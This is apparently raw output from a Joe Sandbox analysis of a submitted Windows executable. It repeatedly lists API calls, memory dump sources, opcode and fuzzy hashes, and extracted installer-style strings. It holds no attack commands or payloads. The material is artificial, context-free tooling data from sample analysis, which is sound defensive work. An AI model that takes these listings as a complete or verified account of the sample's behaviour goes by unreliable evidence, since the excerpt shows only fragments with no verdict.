                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                    • API String ID: 3677997916-1910633163
                                                                                    • Opcode ID: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                    • Instruction ID: c869957850822339a6d2b86bec0dd1f4db8a349efa053aa20552817ac18695c5
                                                                                    • Opcode Fuzzy Hash: 220f1d90dc9d01e70f51e07e52e95aefa24747c0d438b7241eb26c36c3cc7d10
                                                                                    • Instruction Fuzzy Hash: 94F01975E4020DAADF10EAD18C45BAF73BCAB04708F104967FB10E7290E779AA45CB5A
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                    • API String ID: 1646373207-4063490227
                                                                                    • Opcode ID: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                    • Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
                                                                                    • Opcode Fuzzy Hash: 2d19be5e9d3f7a56a1e4775df43ad67afc209c47152956cd3dcb438fc33ecc86
                                                                                    • Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                    • Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
                                                                                    • Opcode Fuzzy Hash: d728472e8339f2ffff8a63abc478e5e6a1fb2f9fde307aaa74d21bec7cd435e2
                                                                                    • Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                    • Instruction ID: 4607b44a290c0083fd8a3bbebdee3b5c85a8181a3f50ff176a2b10a78ee17b7d
                                                                                    • Opcode Fuzzy Hash: d6cd7607be6575f9249c3beb1cc04364ec349a9d743fe925dab93869ddeda9f1
                                                                                    • Instruction Fuzzy Hash: 0BB012CA68170450CC1032F28C07E1F1C0C4C80769B1604373C00F10C3CF6CD800483E
                                                                                    APIs
                                                                                      • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                      • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
                                                                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                    • API String ID: 2238633743-2683653824
                                                                                    • Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                    • Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
                                                                                    • Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
                                                                                    • Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F
                                                                                    APIs
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
                                                                                    • FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                    • Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
                                                                                    • Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
                                                                                    • Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54
                                                                                    APIs
                                                                                      • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
                                                                                      • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
                                                                                    • GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountErrorFileLastMoveTick
                                                                                    • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                    • API String ID: 2406187244-2685451598
                                                                                    • Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                    • Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
                                                                                    • Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
                                                                                    • Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 00413D56
                                                                                    • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                      • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
                                                                                      • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
                                                                                    • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorDesktopWindow$Show
                                                                                    • String ID:
                                                                                    • API String ID: 2074268717-0
                                                                                    • Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                    • Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
                                                                                    • Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
                                                                                    • Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                    • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                    • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$FileMessageModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 704749118-0
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                                      • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                                    • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                                      • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                    • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                                    • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                    • String ID:
                                                                                    • API String ID: 855768636-0
                                                                                    APIs
                                                                                    • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                                    • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                                    • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                                    • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                                    Similarity
                                                                                    • API ID: OffsetRect
                                                                                    • String ID:
                                                                                    • API String ID: 177026234-0
                                                                                    APIs
                                                                                    • GetCursorPos.USER32 ref: 00417270
                                                                                    • SetCursor.USER32(00000000), ref: 004172B3
                                                                                    • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                    • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                    Similarity
                                                                                    • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1959210111-0
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    APIs
                                                                                    • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                    • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                    • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                    • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                    • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                                    • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                                    Strings
                                                                                    • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                                    • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                                    • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                    • API String ID: 1452528299-1392080489
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                                    • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                    • String ID:
                                                                                    • API String ID: 4283692357-0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5
                                                                                    Strings
                                                                                    • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                                    • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                                    • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                    • API String ID: 1452528299-3038984924
                                                                                    • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                    • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                                    • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                                    • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                    • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                                    • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                                    • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                    • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                                    • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                                    • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                                    APIs
                                                                                    • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                    • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                    • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                    • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                    • String ID:
                                                                                    • API String ID: 2280970139-0
                                                                                    • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                    • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                    • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                                    • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                    APIs
                                                                                    • GlobalHandle.KERNEL32 ref: 00406287
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
